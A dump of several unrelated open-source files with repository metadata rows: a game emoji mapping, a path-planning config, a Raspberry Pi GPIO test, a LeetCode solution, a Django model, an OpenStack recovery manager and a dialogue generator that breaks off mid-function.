'<:champ_498:601909586701582336>', '101': '<:champ_101:601909589369159691>', '5': '<:champ_5:601909591667769364>', '157': '<:champ_157:601909594758971468>', '83': '<:champ_83:601909596877094940>', '350': '<:champ_350:601909599469305875>', '154': '<:champ_154:601909605194268673>', '238': '<:champ_238:601909607824359462>', '115': '<:champ_115:601909610885939200>', '26': '<:champ_26:601909614031798447>', '142': '<:champ_142:601909616258973696>', '143': '<:champ_143:601909618808979478>'}
RUNE_ID_TO_EMOJI = {'8112': '<:rune_8112:602195444940144650>', '8124': '<:rune_8124:602195452028518410>', '8128': '<:rune_8128:602195459003514920>', '9923': '<:rune_9923:602195465299165308>', '8126': '<:rune_8126:602195466981212190>', '8139': '<:rune_8139:602195469573160970>', '8143': '<:rune_8143:602195471859056641>', '8136': '<:rune_8136:602195473264017462>', '8120': '<:rune_8120:602195475013173288>', '8138': '<:rune_8138:602195477257256963>', '8135': '<:rune_8135:602195479417192449>', '8134': '<:rune_8134:602195482487554058>', '8105': '<:rune_8105:602195484748152843>', '8106': '<:rune_8106:602195487650742283>', '8351': '<:rune_8351:602195494319423529>', '8359': '<:rune_8359:602195503048032291>', '8360': '<:rune_8360:602195510388064256>', '8306': '<:rune_8306:602195512036163585>', '8304': '<:rune_8304:602195513173082113>', '8313': '<:rune_8313:602195513546244128>', '8321': '<:rune_8321:602195517103014084>', '8316': '<:rune_8316:602195519829311562>', '8345': '<:rune_8345:602195522345893911>', '8347': '<:rune_8347:602195524338319370>', '8410': '<:rune_8410:602195527479722000>', '8352': '<:rune_8352:602195529291661489>', '8005': '<:rune_8005:602195538036785152>', '8008': '<:rune_8008:602195543464345601>', '8021': '<:rune_8021:602195550271700992>', '8010': '<:rune_8010:602195555006939137>', '9101': '<:rune_9101:602195557502681088>', '9111': '<:rune_9111:602195559880851536>', '8009': '<:rune_8009:602195562481057792>', '9104': '<:rune_9104:602195563936743455>', '9105': '<:rune_9105:602195565408813056>', '9103': '<:rune_9103:602195567241854979>', '8014': '<:rune_8014:602195568759930900>', '8017': '<:rune_8017:602195571364724774>', '8299': '<:rune_8299:602195573952479242>', '8437': '<:rune_8437:602195580919349261>', '8439': '<:rune_8439:602195586468544533>', '8465': '<:rune_8465:602195592357347358>', '8446': '<:rune_8446:602195594643243018>', '8463': '<:rune_8463:602195596736200757>', '8401': '<:rune_8401:602195601475764234>', '8429': '<:rune_8429:602195603308675078>', '8444': '<:rune_8444:602195605334392832>', '8473': '<:rune_8473:602195607670620161>', '8451': '<:rune_8451:602195610233339914>', '8453': '<:rune_8453:602195612569567250>', '8242': '<:rune_8242:602195615321030840>', '8214': '<:rune_8214:602195620601528330>', '8229': '<:rune_8229:602195626293198859>', '8230': '<:rune_8230:602195631255060541>', '8224': '<:rune_8224:602195633171857418>', '8226': '<:rune_8226:602195635868925970>', '8275': '<:rune_8275:602195639140483072>', '8210': '<:rune_8210:602195640432328792>', '8234': '<:rune_8234:602195643515011092>', '8233': '<:rune_8233:602195645956096010>', '8237': '<:rune_8237:602195647268913162>', '8232': '<:rune_8232:602195649907392525>', '8236': '<:rune_8236:602195652235231235>'}
MASTERIES_TO_EMOJI = {'1': '<:masteries_1:602201182131322886>', '2': '<:masteries_2:602201195792039967>', '3': '<:masteries_3:602201208505106453>', '4': '<:masteries_4:602201225701883924>', '5': '<:masteries_5:602201238528065557>', '6': '<:masteries_6:602201251069034496>', '7': '<:masteries_7:602201263152693325>'}
CHAMP_NONE_EMOJI = "<:champ_0:602225831095435294>"
INVISIBLE_EMOJI = "<:__:602265603893493761>"
CHAMP_NAME_TO_ID = {'Aatrox': '266', 'Ahri': '103', 'Akali': '84', 'Alistar': '12', 'Amumu': '32', 'Anivia': '34', 'Annie': '1', 'Ashe': '22', 'Aurelion Sol': '136', 'Azir': '268', 'Bard': '432', 'Blitzcrank': '53', 'Brand': '63', 'Braum': '201', 'Caitlyn': '51', 'Camille': '164', 'Cassiopeia': '69', "Cho'Gath": '31', 'Corki': '42', 'Darius': '122', 'Diana': '131', 'Draven': '119', 'Dr. Mundo': '36', 'Ekko': '245', 'Elise': '60', 'Evelynn': '28', 'Ezreal': '81', 'Fiddlesticks': '9', 'Fiora': '114', 'Fizz': '105', 'Galio': '3', 'Gangplank': '41', 'Garen': '86', 'Gnar': '150', 'Gragas': '79', 'Graves': '104', 'Hecarim': '120', 'Heimerdinger': '74', 'Illaoi': '420', 'Irelia': '39', 'Ivern': '427', 'Janna': '40', 'Jarvan IV': '59', 'Jax': '24', 'Jayce': '126', 'Jhin': '202', 'Jinx': '222', "Kai'Sa": '145', 'Kalista': '429', 'Karma': '43', 'Karthus': '30', 'Kassadin': '38', 'Katarina': '55', 'Kayle': '10', 'Kayn': '141', 'Kennen': '85', "Kha'Zix": '121', 'Kindred': '203', 'Kled': '240', "Kog'Maw": '96', 'LeBlanc': '7', 'Lee Sin': '64', 'Leona': '89', 'Lissandra': '127', 'Lucian': '236', 'Lulu': '117', 'Lux': '99', 'Malphite': '54', 'Malzahar': '90', 'Maokai': '57', 'Master Yi': '11', 'Miss Fortune': '21', 'Wukong': '62', 'Mordekaiser': '82', 'Morgana': '25', 'Nami': '267', 'Nasus': '75', 'Nautilus': '111', 'Neeko': '518', 'Nidalee': '76', 'Nocturne': '56', 'Nunu & Willump': '20', 'Olaf': '2', 'Orianna': '61', 'Ornn': '516', 'Pantheon': '80', 'Poppy': '78', 'Pyke': '555', 'Qiyana': '246', 'Quinn': '133', 'Rakan': '497', 'Rammus': '33', "Rek'Sai": '421', 'Renekton': '58', 'Rengar': '107', 'Riven': '92', 'Rumble': '68', 'Ryze': '13', 'Sejuani': '113', 'Senna': '235', 'Shaco': '35', 'Shen': '98', 'Shyvana': '102', 'Singed': '27', 'Sion': '14', 'Sivir': '15', 'Skarner': '72', 'Sona': '37', 'Soraka': '16', 'Swain': '50', 'Sylas': '517', 'Syndra': '134', 'Tahm Kench': '223', 'Taliyah': '163', 'Talon': '91', 'Taric': '44', 'Teemo': '17', 'Thresh': '412', 'Tristana': '18', 'Trundle': '48', 'Tryndamere': '23', 'Twisted Fate': '4', 'Twitch': '29', 'Udyr': '77', 'Urgot': '6', 'Varus': '110', 'Vayne': '67', 'Veigar': '45', "Vel'Koz": '161', 'Vi': '254', 'Viktor': '112', 'Vladimir': '8', 'Volibear': '106', 'Warwick': '19', 'Xayah': '498', 'Xerath': '101', 'Xin Zhao': '5', 'Yasuo': '157', 'Yorick': '83', 'Yuumi': '350', 'Zac': '154', 'Zed': '238', 'Ziggs': '115', 'Zilean': '26', 'Zoe': '142', 'Zyra': '143'}
TFT_PRICES = [INVISIBLE_EMOJI, '<:tft_g1:652142396405972992>', '<:tft_g2:652142435606069248>', '<:tft_g3:652142468007067649>', '<:tft_g4:652142511913041960>', '<:tft_g5:652142572541575181>'] | [
"mceldenn@gmail.com"
] | mceldenn@gmail.com |
dc8402c232d6ab46a1595210ee6304cf9a9a40f6 | 55d4c18fdef438d73a9172a5cc9d55963e9690a6 | /GSO/4.Dynamic Obstacles/config_user.py | c6c72cdc587707a29055d683a15b1bee130eaf9f | [] | no_license | saxenapriyansh/GSO-Path-Planning | 9bf723a58658e7a4565ceb62801ab8ecf9d8e400 | e334ee5858639ab75b7be84cd19da964b98b4d89 | refs/heads/master | 2021-10-27T17:13:58.988517 | 2019-04-18T14:42:25 | 2019-04-18T14:42:25 | 180,512,081 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,830 | py | # Configuration File
from __future__ import division
import math
import collections
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
testingMode = False # suppresses figure generation, outputs from main*.py are not printed
makeFigure = True
makeMovie = True
startWithEmptyMap = True
makeRandObs = False
useMovingObs = True
useMovingGoals = True
restrictVerticalMovement = True
useHierarchicalPlanning = True
numHierLevels = 0
######################################
staticX, staticY, staticZ = 64, 10, 6
######################################
percentFixedRandomObstacles = 0
safetymargin = 1
cX, cY, cZ = 1, 1, 2 # cX and cY currently are unused - modify computeCost if desired
heuristicScale = 1.01
searchRadius = 20
refinementDistance = math.ceil(searchRadius * 1) # must be an integer
t_max = float('inf') # Max time to spend on path-finding, in milliseconds. Enter inf to prevent restriction
sizeX = 64
sizeY = 64
sizeZ = 64
mapscale = 1
start = (3*mapscale , 3*mapscale, 6*mapscale) # start coordinates
goals = np.array([[18., 16., 19., 0.], [staticX, staticY, staticZ, 0.]]) * mapscale # goal coordinates
# Configure Moving Goals
initX = [4, 12]# [7, 6]
initY = [2, 3]#[5, 2]
initZ = [3, 4]#[2, 7]
T = [5, 4]#[5, 2]
obs = np.array([[56., 26., 6., 0.]]) * mapscale
obsX = [30, 40,10,6,47,25,59] #[12, 6]
obsY = [5, 30,50,6,57,48,9] #[3, 2]
obsZ = [26, 6,50,6,17,28,39] #[4, 7]
T_obs = [3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3,3, 3 , 3, 3, 3]
# Fixed Individual Obstacles
obstacles = []
# Fixed Rectangular Obstacles
rXstart = [8, 12, 15, 35, 41, 49]
rYstart = [2, 15, 35, 10, 20, 47]
rZstart = [1, 1, 1, 1, 1, 1]
rXdim = [4, 20, 30, 5, 8, 6]
rYdim = [9, 12, 8, 5, 8, 6]
rZdim = [30, 8, 15, 28, 20, 28]
# rXstart = []
# rYstart = []
# rZstart = []
# rXdim = []
# rYdim = []
# rZdim = []
vidname = '4.GSOVid'
fps = 10 # higher = faster playback speed
dpi = 500 # higher = better quality, slower runtime
imgformat = 'png' # currently only works for png
# Generate Random Dynamic Obstacles
randomint = np.random.random_integers
minObs = 1
maxObs = 3
maxPercent = 8
seedDyn = np.random.randint(0,1000)
#seedDyn = np.random.randint(0,10)
#seedDyn = 432
# Generate Random Fixed Obstacles
num2gen = int(round(percentFixedRandomObstacles/100 * sizeX*sizeY*sizeZ))
seedStatic = np.random.random_integers(0,1000)
#seedStatic = np.random.random_integers(0,10
#seedStatic = 141
"""
====================================================================================
================== Variables below this line are not user inputs ===================
============== They are here for configuration or to create variables ==============
====================================================================================
============== The " # Additional variables " block at the very bottom =============
============== is the exception to this and may be modified if desired =============
====================================================================================
"""
# if testingEnvironment == '3DF_20':
# sizeX, sizeY, sizeZ = 150, 150, 150
# start = (75,75,75)
# goals = np.array([[150, 150, 150, 0]])
# percentFixedRandomObstacles = 20
# restrictVerticalMovement = False
# cX, cY, cZ = 1, 1, 1
# searchRadius = 7
# percentFixedRandomObstacles = 20
#
# elif testingEnvironment == '3DF_50':
# sizeX, sizeY, sizeZ = 150, 150, 150
# start = (75,75,75)
# goals = np.array([[150, 150, 150, 0]])
# percentFixedRandomObstacles = 20
# restrictVerticalMovement = False
# cX, cY, cZ = 1, 1, 1
# searchRadius = 7
# percentFixedRandomObstacles = 50
#
# elif testingEnvironment == 'city':
# sizeX = 64
# sizeY = 64
# sizeZ = 64
# start = (3*mapscale , 4*mapscale, 6*mapscale)
# goals = np.array([[62., 60., 6., 0.]]) * mapscale
# percentFixedRandomObstacles = 0
#
# rXstart = [8, 12, 15, 35, 41, 49]
# rYstart = [2, 15, 35, 10, 20, 47]
# rZstart = [1, 1, 1, 1, 1, 1]
# rXdim = [4, 20, 30, 5, 8, 6]
# rYdim = [9, 12, 8, 5, 8, 6]
# rZdim = [30, 8, 15, 28, 20, 28]
#
# elif testingEnvironment == 'random':
# sizeX = 150
# sizeY = 150
# sizeZ = 150
# start = (5 , 5, sizeZ/2)
# goals = np.array([[sizeX-5., sizeY-5., sizeZ/2., 0.]])
# Modifying by scale factor
initX = [mapscale*point for point in initX]
initY = [mapscale*point for point in initY]
initZ = [mapscale*point for point in initZ]
obsX = [mapscale*point for point in obsX]
obsY = [mapscale*point for point in obsY]
obsZ = [mapscale*point for point in obsZ]
rXstart = [mapscale*(point) for point in rXstart if point >= 1]
rYstart = [mapscale*(point) for point in rYstart if point >= 1]
rZstart = [point for point in rZstart if point >= 1]
rXdim = [mapscale*(point) for point in rXdim if point <= sizeX]
rYdim = [mapscale*(point) for point in rYdim if point <= sizeY]
rZdim = [mapscale*(point) for point in rZdim if point <= sizeZ]
sizeX *= mapscale
sizeY *= mapscale
sizeZ *= mapscale
if testingMode:
makeFigure = False
makeMovie = False
if makeMovie:
makeFigure = True
if not useMovingGoals:
initX = []
initY = []
initZ = []
T = []
goalsVisited, goalhandles, numGoals, goal = [], [], [], []
stepCount = 1 # number of total iterations
number_of_obstacles = 0 # for genRandObs function
numNodes = sizeX*sizeY*sizeZ
goalMoved = False
numlevels = 0
# Set up initial heading angles to factor in direction of travel
oldstart = None
# Set up UAV map and plot
map_ = collections.defaultdict(lambda : 0)
costMatrix = collections.defaultdict(lambda: 1)
if makeFigure:
fig1 = plt.figure()
#ax1 = fig1.add_subplot(111, projection='3d')
ax1 = fig1.gca(projection='3d')
# Used to save some variables
hdl = []
closed_list = 0
output = {}
# Additional variables
zf1, zf2 = 1, 0 # provides more flexibility over coarse z-movement; zf1 = multiplier, zf2 = added constant
# use (1,0) for default, or (0,x) to set coarse z-successors at a distance of x
distancerequirement = 7 # used in findPath function. determines cluster size used for coarse paths
# shorter = faster, but may have longer paths
# too small and it may not find a path, so >=6 recommended
minclustersize = 4 # represents dimension of smallest cluster in terms of L0 nodes
alpha = 0.5 # use 0.5 for centripetal splines
splinePoints = 5 # Enter 2 to not use splines, otherwise 5 is recommended | [
"saxenapriyanshasd@gmail.com"
] | saxenapriyanshasd@gmail.com |
138ad6816981ced62f71bd3859116d1fa7ecfa16 | e8d34c096f9df7f22ff5ccee34cf9f6e6a0adab4 | /flask_login/test_gpios.py | 3de4b6984d75c2f38c64ff8539dbc50799074af9 | [] | no_license | MarianoDel/coralpreto_py | 50fed2bd4032d4e3adc29c06de4b096ee1b3833a | 06bbe3f814fdbf80ae58b1ba6a53d0e96f0ec566 | refs/heads/master | 2023-03-07T14:19:19.074639 | 2022-03-25T17:34:38 | 2022-03-25T17:34:38 | 238,445,438 | 0 | 0 | null | 2023-03-05T06:04:33 | 2020-02-05T12:30:05 | JavaScript | UTF-8 | Python | false | false | 1,416 | py | # -*- coding: utf-8 -*-
#usar python3
import time
RUNNING_ON_RASP = 0
if RUNNING_ON_RASP:
from gpios import *
GpiosInit()
def TestBlue():
print ("start blinking blue led for 10 secs")
if RUNNING_ON_RASP:
LedBlueToggleContinous('start')
time.sleep(10)
print ("ending toggling")
if RUNNING_ON_RASP:
LedBlueToggleContinous('stop')
print ("test ended!")
def TestChannel ():
channel = ['09', '12', '14', '71', '72', '74', '77', '81']
for i in range(len(channel)):
print ("memory: " + str(i) + " test channel: " + channel[i])
if RUNNING_ON_RASP:
Channel_to_Memory(channel)
time.sleep(5)
print ("test ended!")
def TestPtt():
print ("PTT on for 5 secs")
if RUNNING_ON_RASP:
PttOn()
time.sleep(5)
if RUNNING_ON_RASP:
PttOff()
print ("Ptt off")
print ("test ended!")
def TestEncendido():
print ("Encendido on for 5 secs")
if RUNNING_ON_RASP:
OnOff_On()
time.sleep(5)
if RUNNING_ON_RASP:
OnOff_Off()
print ("Encendido off")
print ("test ended!")
def InitialValues ():
LedBlueOff()
PttOff()
OnOff_Off()
Bit0Off()
Bit1Off()
Bit2Off()
##############
# Main Tests #
##############
InitialValues()
TestBlue()
TestChannel()
TestPtt()
TestEncendido()
GpiosCleanUp()
| [
"marianodeleu@yahoo.com.ar"
] | marianodeleu@yahoo.com.ar |
fe5008878edb08f5883649ab0765b19fdb4de0ce | 3b944f1714c458c5d6d0e84d4b1498f2b59c4ef7 | /581. Shortest Unsorted Continuous Subarray.py | 3fa7d45d3112e56a100aa8150f35c38a0d623fae | [] | no_license | shiannn/LeetCodePython | e4d66f108200d8329616b3e45b70c3f8fc4cd9ed | 6e4472d41904e60ff9d70b5f3979c5dcae98c838 | refs/heads/master | 2021-06-26T03:24:03.079077 | 2021-02-24T16:54:18 | 2021-02-24T16:54:18 | 213,206,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | class Solution:
def findUnsortedSubarray(self, nums) -> int:
end = -2
start = -1
max_ = -float('inf')
for idx, num in enumerate(nums):
max_ = max(max_, num)
if max_ != num:
end = idx
min_ = float('inf')
for idx, num in reversed(list(enumerate(nums))):
#print(idx, num)
min_ = min(min_, num)
if min_ != num:
start = idx
#print(start, end)
return end - start + 1
if __name__ == '__main__':
sol = Solution()
nums = [2,6,4,8,10,9,15]
ret = sol.findUnsortedSubarray(nums)
print(ret) | [
"b05502087@ntu.edu.tw"
] | b05502087@ntu.edu.tw |
e59999e3a7d2a6f4b66c537625cf26c6815890f4 | 20d1969e0b202b38f7735fb2509f3db6a0d5fea1 | /models.py | c9d943d9cdb341c0c7f0d3d95db38cbf12a3de4b | [] | no_license | TukieYA/my-first-app | 8158ad73dc2fd307ca2547c7cad1afad615a55ea | f62453f17ef681669063e0506b75423497cf77b9 | refs/heads/master | 2021-01-05T20:12:54.870785 | 2020-02-17T13:53:36 | 2020-02-17T13:53:36 | 241,125,380 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | from django.db import models
from django.conf import settings
from django.db import models
from django.utils import timezone
class Post(models.Model):
author = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
title = models.CharField(max_length=200)
text = models.TextField()
created_date = models.DateTimeField(default=timezone.now)
published_date = models.DateTimeField(blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.title
| [
"ilnur.musin.03@mail.ru"
] | ilnur.musin.03@mail.ru |
701cceafbc17e8595614eabc2d26909564c55589 | 99249dad36df26a712ae8d900041d53acf3901ea | /settings/channel_archiver/NIH.SAMPLE_FROZEN_XRAY_settings.py | 0cf3746eba7d2d3f8917deddf604d4ffaa86f80d | [
"MIT"
] | permissive | bopopescu/Lauecollect | f1f79c2cc5ff106df0dedbd6939ec92630d2b305 | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | refs/heads/master | 2022-11-29T00:40:28.384831 | 2019-06-05T01:21:36 | 2019-06-05T01:21:36 | 280,989,300 | 0 | 0 | MIT | 2020-07-20T02:03:22 | 2020-07-20T02:03:22 | null | UTF-8 | Python | false | false | 111 | py | SPOTS.filename = '//femto/C/All Projects/APS/Experiments/2019.05/Test/Archive/NIH.SAMPLE_FROZEN_XRAY.SPOTS.txt' | [
"friedrich.schotte@gmail.com"
] | friedrich.schotte@gmail.com |
0b7f2dfe5e49b472a8425e098959e9023bb7ecd1 | 7aa5966732a9e3d49821599329950a16c88ab286 | /week2task1.py | bc9b4f322647785d467a566b98af1219541b98c8 | [] | no_license | Sal-Eng-666/WIDweek2 | 7cabd6eb0bf68df68e76da725f56593c89e6abc7 | fa9951b4727d57ccc85746e91aaa3f394e14baa1 | refs/heads/master | 2023-03-04T20:57:01.081060 | 2021-01-17T12:25:52 | 2021-01-17T12:25:52 | 329,721,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | #create your own DFD, a subject of your own choice and convert it into code
def procedure_1(inp_menuoption):
beer = 1
cider = 2
wine = 3
non_alcoholic = 4
print("Hello, what drink would you like?")
menuoption = int(input("Select an option 1 for beer, 2 for cider, 3 for wine or 4 for a non alcoholic drink"))
if (menuoption ==1):
print("Would you like a Lager, Ale or Stout?")
elif (menuoption ==2):
print("Dry, Sweet or Fruit based?")
elif (menuoption ==3):
print("Red, White, Rose or Sparkling?")
elif (menuoption == 4):
print("Tea, Coffee, or Soft Drink?")
def procedure_2(inp_menuoption2):
lager = 5
ale = 6
stout = 7
dry = 8
sweet = 9
fruit = 10
menuoption2 (input("Will that be a pint or a half?"))
| [
"lady_snowblood@hotmail.com"
] | lady_snowblood@hotmail.com |
585fdc24817f4227bd9b735d629d948023a89550 | 9c89ab8fd0a4e1b488005ccbce94de879f319bc6 | /recover-client/manager.py | b057fc5ba2d219d39cc0e19652c1e407a98540e2 | [] | no_license | openstackenabling/vmrecovery | e1752bc901a9c3f4dfa335cdb159d6d0c24dd2c1 | 8100dadbb656ac337b80c93060066bc2e685e8a4 | refs/heads/master | 2021-01-16T20:42:55.826886 | 2013-05-16T08:36:48 | 2013-05-16T08:36:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,827 | py | #
# Copyright (C) 2013 Intel Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova import flags
from nova import manager
from nova.openstack.common import cfg
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
scheduler_driver_opt = cfg.StrOpt('recover_driver',
default='nova.recover.driver.RecoverDriver',
help='Default driver to use for the recover')
FLAGS = flags.FLAGS
FLAGS.register_opt(scheduler_driver_opt)
LOG = logging.getLogger(__name__)
topic = 'recover'
class RecoverManager(manager.Manager):
RPC_API_VERSION = "1.0"
def __init__(self, driver=None, *args, **kwargs):
if not driver:
driver = FLAGS.recover_driver
self.driver = importutils.import_object(driver)
super(RecoverManager, self).__init__(*args, **kwargs)
def recover_vm(self, context, port_id, port_mac, vm_uuid, vm_name):
"""
Recover vm net by quantum service ,and vm by libvirt
:param context:
:param port_id:
:param port_mac:
:param vm_uuid:
:param vm_name:
:return:
"""
self.driver.recover_vm(context, vm_name, vm_uuid, port_id, port_mac)
| [
"heyuan.liu@intel.com"
] | heyuan.liu@intel.com |
f82d11c69de4d63b9824a1f73e4ded7104d8526b | e2ed3e8c78e3a9da30c354bfbc833e17eef037eb | /Diagen/diagen.py | b161062ee912930e76186abaa606c03afc2bf71d | [
"MIT"
] | permissive | Dav-Edward/Tachyon-Starwisp-Mod | 044049e04c178ce0cce5851843f6da341b9e0137 | 542d4ff128a8084ec42dcc9d41db8866ab0638eb | refs/heads/master | 2021-07-25T13:06:49.104131 | 2020-06-07T19:17:05 | 2020-06-07T19:17:05 | 181,711,435 | 1 | 0 | null | 2020-03-29T20:38:46 | 2019-04-16T14:56:17 | Python | UTF-8 | Python | false | false | 27,244 | py | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Hornwitser
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from xml.etree.ElementTree import Comment, Element, ElementTree, SubElement
from collections import namedtuple
from itertools import count
__all__ = [
'Label', 'Choice', 'Condition', 'Goto', 'End',
'Event', 'Reply', 'InlineEvent', 'EventDef', 'ChainEvent', 'SpawnNPC',
'AddShip', 'Ai', 'AddDebris', 'Item', 'xml_dialogues', 'xml_pretty',
]
## Message Dirictives
# Set the next message's id
Label = namedtuple('Label', 'id')
# Signal the end of the message stream.
class EndType:
def __new__(cls):
return End
@staticmethod
def __repr__():
return 'End'
End = object.__new__(EndType)
# Continue with given id.
Goto = namedtuple('Goto', 'target')
# Attach an event to the previous message.
Event = namedtuple('Event', 'id target')
# Set the reply text of the previous message.
_BaseReply = namedtuple('Reply', 'text params')
class Reply(_BaseReply):
def __new__(cls, text=None, params={}, **extra):
return super().__new__(cls, text, {**params, **extra})
# Specifies a multiple choice message. Choices is a list of subsections. The
# reply element generated can be modified with Reply, Condition, Goto and End
# put at the start of a choice subsection
Choice = namedtuple('Choice', 'text choices')
# Attach an event defined inline to the previous message
_BaseInlineEvent = namedtuple('InlineEvent', 'type target name params')
class InlineEvent(_BaseInlineEvent):
def __new__(cls, type, target, name=None, params={}, **extra):
return super().__new__(cls, type, target, name, {**params, **extra})
## Event Directives
# Define an event
_BaseEventDef = namedtuple('EventDef', 'type name params')
class EventDef(_BaseEventDef):
def __new__(cls, type, name, params={}, **extra):
return super().__new__(cls, type, name, {**params, **extra})
# Define an event and attach it to the previous event
_BaseChainEvent = namedtuple('ChainEvent', 'type name params')
class ChainEvent(_BaseChainEvent):
def __new__(cls, type, name=None, params={}, **extra):
return super().__new__(cls, type, name, {**params, **extra})
# Defines an npc spawn for either an event or a ship
_BaseSpawnNPC = namedtuple('SpawnNPC', 'params')
class SpawnNPC(_BaseSpawnNPC):
def __new__(cls, params={}, **extra):
return super().__new__(cls, {**params, **extra})
# Defines a ship for an event
_BaseAddShip = namedtuple('AddShip', 'params')
class AddShip(_BaseAddShip):
def __new__(cls, params={}, **extra):
return super().__new__(cls, {**params, **extra})
# Defines an ai for either a ship or npc
_BaseAi = namedtuple('Ai', 'type params')
class Ai(_BaseAi):
def __new__(cls, type, params={}, **extra):
return super().__new__(cls, type, {**params, **extra})
# Defines a debris node for an event
_BaseAddDebris = namedtuple('AddDebris', 'params')
class AddDebris(_BaseAddDebris):
def __new__(cls, params={}, **extra):
return super().__new__(cls, {**params, **extra})
# Defines an item for a debris node
_BaseItem = namedtuple('Item', 'params')
class Item(_BaseItem):
def __new__(cls, params={}, **extra):
return super().__new__(cls, {**params, **extra})
## Shared Directives
# Specifies the condition of a choice, event or ai. May only be used at the
# start of a choice subsection or after an event, ship or npc definition.
_BaseCondition = namedtuple('Condition', 'type params')
class Condition(_BaseCondition):
def __new__(cls, type, params={}, **extra):
return super().__new__(cls, type, {**params, **extra})
# Internal use types
class AutoType:
def __new__(cls):
return Auto
@staticmethod
def __repr__():
return 'Auto'
Auto = object.__new__(AutoType)
class ParsedReply:
def __init__(self, target, text, params):
self.id = Auto
self.target = target
self.text = text
self.params = params
self.conditions = []
class ParsedMessage:
def __init__(self, mid, text):
self.id = mid
self.text = text
self.next = Auto
self.response = Auto
self.choices = []
self.events = []
class ParsedEvent:
def __init__(self, event_type, name, params):
self.type = event_type
self.name = name
self.params = params
self.target = None
self.conditions = []
self.npcs = []
self.debris = []
self.ships = []
class ParsedDebri:
def __init__(self, params):
self.params = params
self.items = []
class ParsedAi:
def __init__(self, ai_type, params):
self.type = ai_type
self.params = params
self.conditions = []
class ParsedNPC:
def __init__(self, params):
self.params = params
self.ais = []
class ParsedShip:
def __init__(self, params):
self.params = params
self.ais = []
self.npcs = []
class ParseError(Exception):
"""Raised if an error occurs during section parsing"""
def __init__(self, msg, pos, section):
self.msg = msg
self.pos = pos
self.section = section
self.parents = []
FlatMessage = namedtuple('FlatMessage', 'id text replies events')
FlatReply = namedtuple('FlatReply', 'id target text conditions params')
def auto(value, auto_value):
"""Replace a value being Auto with auto_value"""
return auto_value if value is Auto else value
def parse_reply(pos, section):
"""Parse reply modifiers from the start of a subsection"""
reply = ParsedReply(Auto, Auto, {})
while pos < len(section):
mod = section[pos]
if type(mod) is Reply:
if mod.text is not None:
if reply.text is not Auto:
raise ParseError("Reply cannot be chained", pos, section)
reply.text = mod.text
reply.params.update(mod.params)
elif type(mod) is Condition:
reply.conditions.append(mod)
elif mod is End:
reply.target = None
elif type(mod) is Goto:
reply.target = mod.target
else:
break
pos += 1
return pos, reply
def parse_debris(pos, section):
"""Parse derbis node with items"""
if type(section[pos]) is not AddDebris:
raise TypeError(f"parse_debris called on {section[pos]}")
debris = ParsedDebri(section[pos].params)
pos += 1
while pos < len(section):
item = section[pos]
if type(item) is Item:
debris.items.append(item)
else:
break
pos += 1
return pos, debris
def parse_ai(pos, section):
"""Parse AI node with conditions"""
if type(section[pos]) is not Ai:
raise TypeError(f"parse_ai called on {section[pos]}")
ai = ParsedAi(section[pos].type, section[pos].params)
pos += 1
while pos < len(section):
item = section[pos]
if type(item) is Condition:
ai.conditions.append(item)
else:
break
pos += 1
return pos, ai
def parse_npc(pos, section):
"""Parse NPC node with AIs"""
if type(section[pos]) is not SpawnNPC:
raise TypeError(f"parse_npc called on {section[pos]}")
npc = ParsedNPC(section[pos].params)
pos += 1
while pos < len(section):
item = section[pos]
if type(item) is Ai:
pos, ai = parse_ai(pos, section)
npc.ais.append(ai)
continue
else:
break
pos += 1
return pos, npc
def parse_ship(pos, section):
"""Parse ship with AIs and NPCs"""
if type(section[pos]) is not AddShip:
raise TypeError(f"parse_ship called on {section[pos]}")
ship = ParsedShip(section[pos].params)
pos += 1
while pos < len(section):
item = section[pos]
if type(item) is Ai:
pos, ai = parse_ai(pos, section)
ship.ais.append(ai)
continue
elif type(item) is SpawnNPC:
pos, npc = parse_npc(pos, section)
ship.npcs.append(npc)
continue
else:
break
pos += 1
return pos, ship
def parse_event(pos, section):
"""Parse event with conditions, npcs, ships and debris"""
item = section[pos]
if type(item) is InlineEvent:
event = ParsedEvent(item.type, item.name, item.params)
event.target = item.target
if event.name is None:
event.name = Auto
elif type(item) is EventDef:
event = ParsedEvent(item.type, item.name, item.params)
else:
